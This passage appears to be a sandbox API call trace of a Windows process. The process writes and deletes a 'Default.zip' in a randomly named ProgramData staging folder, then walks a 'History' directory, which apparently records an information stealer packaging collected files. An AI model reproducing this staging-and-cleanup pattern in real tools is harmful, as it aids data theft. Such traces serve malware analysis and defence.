1 [0116.427] WriteFile (in: hFile=0x358, lpBuffer=0x19e074*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19e074*, lpNumberOfBytesWritten=0x19ded0*=0x12, lpOverlapped=0x0) returned 1 [0116.427] WriteFile (in: hFile=0x358, lpBuffer=0x19e28c*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19e28c*, lpNumberOfBytesWritten=0x19ded0*=0x11, lpOverlapped=0x0) returned 1 [0116.427] GetDesktopWindow () returned 0x10010 [0116.427] GetTickCount () returned 0x123097e [0116.427] GetLastError () returned 0x0 [0116.427] SetLastError (dwErrCode=0x0) [0116.428] GetLastError () returned 0x0 [0116.428] SetLastError (dwErrCode=0x0) [0116.428] GetLastError () returned 0x0 [0116.428] SetLastError (dwErrCode=0x0) [0116.428] GetLastError () returned 0x0 [0116.428] SetLastError (dwErrCode=0x0) [0116.428] GetLastError () returned 0x0 [0116.428] SetLastError (dwErrCode=0x0) [0116.428] GetLastError () returned 0x0 [0116.428] SetLastError (dwErrCode=0x0) [0116.428] GetLastError () returned 0x0 [0116.428] SetLastError (dwErrCode=0x0) [0116.428] GetLastError () returned 0x0 [0116.428] SetLastError (dwErrCode=0x0) [0116.428] GetLastError () returned 0x0 [0116.428] SetLastError (dwErrCode=0x0) [0116.428] GetLastError () returned 0x0 [0116.428] SetLastError (dwErrCode=0x0) [0116.428] GetLastError () returned 0x0 [0116.428] SetLastError (dwErrCode=0x0) [0116.428] GetLastError () returned 0x0 [0116.428] SetLastError (dwErrCode=0x0) [0116.428] GetLastError () returned 0x0 [0116.431] SetLastError (dwErrCode=0x0) [0116.431] ReadFile (in: hFile=0x564, lpBuffer=0x38eba1c, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19deec, lpOverlapped=0x0 | out: lpBuffer=0x38eba1c*, lpNumberOfBytesRead=0x19deec*=0x16, lpOverlapped=0x0) returned 1 [0116.432] WriteFile (in: hFile=0x358, lpBuffer=0x38eba1c*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x19deec, lpOverlapped=0x0 | out: lpBuffer=0x38eba1c*, lpNumberOfBytesWritten=0x19deec*=0x16, lpOverlapped=0x0) returned 1 [0116.432] ReadFile (in: hFile=0x564, lpBuffer=0x38eba1c, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19deec, lpOverlapped=0x0 | out: lpBuffer=0x38eba1c*, lpNumberOfBytesRead=0x19deec*=0x0, lpOverlapped=0x0) returned 1 [0116.432] CloseHandle (hObject=0x564) returned 1 [0116.432] SetFilePointer (in: hFile=0x358, lDistanceToMove=146, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x92 [0116.432] WriteFile (in: hFile=0x358, lpBuffer=0x19def3*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19def3*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.432] WriteFile (in: hFile=0x358, lpBuffer=0x19def3*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19def3*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.432] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.432] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.432] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.433] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.433] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.433] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.433] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.433] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.433] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.433] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.433] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.433] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.433] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.433] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.434] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.434] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.434] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.434] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.434] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.434] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.434] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.434] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.434] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.434] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.435] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.435] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.435] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.435] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.435] WriteFile (in: hFile=0x358, lpBuffer=0x19e074*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19e074*, lpNumberOfBytesWritten=0x19ded0*=0x12, lpOverlapped=0x0) returned 1 [0116.435] WriteFile (in: hFile=0x358, lpBuffer=0x19e28c*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19e28c*, lpNumberOfBytesWritten=0x19ded0*=0x11, lpOverlapped=0x0) returned 1 [0116.435] SetFilePointer (in: hFile=0x358, lDistanceToMove=233, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe9 [0116.435] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x9) returned 0x29aab58 [0116.435] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x360) returned 0x29a7d60 [0116.436] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970628 | out: hHeap=0x29a0000) returned 1 [0116.436] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eaaa8 | out: hHeap=0x29a0000) returned 1 [0116.436] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700e0 | out: hHeap=0x29a0000) returned 1 [0116.436] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0116.436] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\Default.zip" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\files\\default.zip")) returned 1 [0116.437] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eabb0 | out: hHeap=0x29a0000) returned 1 [0116.437] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35f70500, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x35f70500, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x36325465, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x16, dwReserved0=0x0, dwReserved1=0x0, cFileName="Default.zip", cAlternateFileName="")) returned 0 [0116.437] FindClose (in: hFindFile=0x7435a0 | out: hFindFile=0x7435a0) returned 1 [0116.437] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a36d0 [0116.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0116.437] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x35) returned 0x38ea718 [0116.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files", cchWideChar=53, lpMultiByteStr=0x38ea718, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files", lpUsedDefaultChar=0x0) returned 53 [0116.437] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2858 [0116.437] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea718 | out: hHeap=0x29a0000) returned 1 [0116.437] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.437] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a69a8 [0116.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x29a69a8, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.437] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a69a8 | out: hHeap=0x29a0000) returned 1 [0116.437] PathMatchSpecW (pszFile="Files", pszSpec="*.*") returned 1 [0116.437] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a36d0 [0116.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0116.438] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x35) returned 0x38ea6d8 [0116.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files", cchWideChar=53, lpMultiByteStr=0x38ea6d8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files", lpUsedDefaultChar=0x0) returned 53 [0116.438] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2bb8 [0116.438] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea6d8 | out: hHeap=0x29a0000) returned 1 [0116.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Files", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0116.438] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x7) returned 0x29a68e8 [0116.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Files", cchWideChar=7, lpMultiByteStr=0x29a68e8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Files", lpUsedDefaultChar=0x0) returned 7 [0116.438] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68e8 | out: hHeap=0x29a0000) returned 1 [0116.438] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\files"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0116.438] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2bb8 | out: hHeap=0x29a0000) returned 1 [0116.438] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.438] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\files")) returned 0 [0116.438] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2858 | out: hHeap=0x29a0000) returned 1 [0116.438] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19ee38 | out: lpFindFileData=0x19ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34782b2c, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x34782b2c, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x34782b2c, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0116.438] lstrcpyW (in: lpString1=0x19f088, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" [0116.438] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\" [0116.438] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\", lpString2="History" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History" [0116.438] lstrcpyW (in: lpString1=0x19f290, lpString2="" | out: lpString1="") returned="" [0116.438] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0116.438] lstrcatW (in: lpString1="\\", lpString2="History" | out: lpString1="\\History") returned="\\History" [0116.438] lstrcmpW (lpString1="History", lpString2=".") returned 1 [0116.438] lstrcmpW (lpString1="History", lpString2="..") returned 1 [0116.439] lstrcpyW (in: lpString1=0x19eb18, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History" [0116.439] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History\\*.*" [0116.439] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History\\*.*", lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34782b2c, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x34782b2c, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x34782b2c, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7436e0 [0116.439] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History" [0116.439] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History\\" [0116.439] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History\\." [0116.439] lstrcpyW (in: lpString1=0x19e910, lpString2="\\History" | out: lpString1="\\History") returned="\\History" [0116.439] lstrcatW (in: lpString1="\\History", lpString2="\\" | out: lpString1="\\History\\") returned="\\History\\" [0116.439] lstrcatW (in: lpString1="\\History\\", lpString2="." | out: lpString1="\\History\\.") returned="\\History\\." [0116.439] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.439] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34782b2c, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x34782b2c, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x34782b2c, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.439] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History" [0116.439] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History\\" [0116.439] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History\\.." [0116.439] lstrcpyW (in: lpString1=0x19e910, lpString2="\\History" | out: lpString1="\\History") returned="\\History" [0116.439] lstrcatW (in: lpString1="\\History", lpString2="\\" | out: lpString1="\\History\\") returned="\\History\\" [0116.439] lstrcatW (in: lpString1="\\History\\", lpString2=".." | out: lpString1="\\History\\..") returned="\\History\\.." [0116.439] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.439] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.439] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34782b2c, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x34782b2c, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x34782b2c, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0116.439] FindClose (in: hFindFile=0x7436e0 | out: hFindFile=0x7436e0) returned 1 [0116.440] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a36d0 [0116.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0116.440] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x37) returned 0x38ea658 [0116.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History", cchWideChar=55, lpMultiByteStr=0x38ea658, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History", lpUsedDefaultChar=0x0) returned 55 [0116.440] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2ae0 [0116.440] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea658 | out: hHeap=0x29a0000) returned 1 [0116.440] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.440] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a6938 [0116.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x29a6938, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.440] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6938 | out: hHeap=0x29a0000) returned 1 [0116.440] PathMatchSpecW (pszFile="History", pszSpec="*.*") returned 1 [0116.440] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a36d0 [0116.440] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706c8 [0116.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 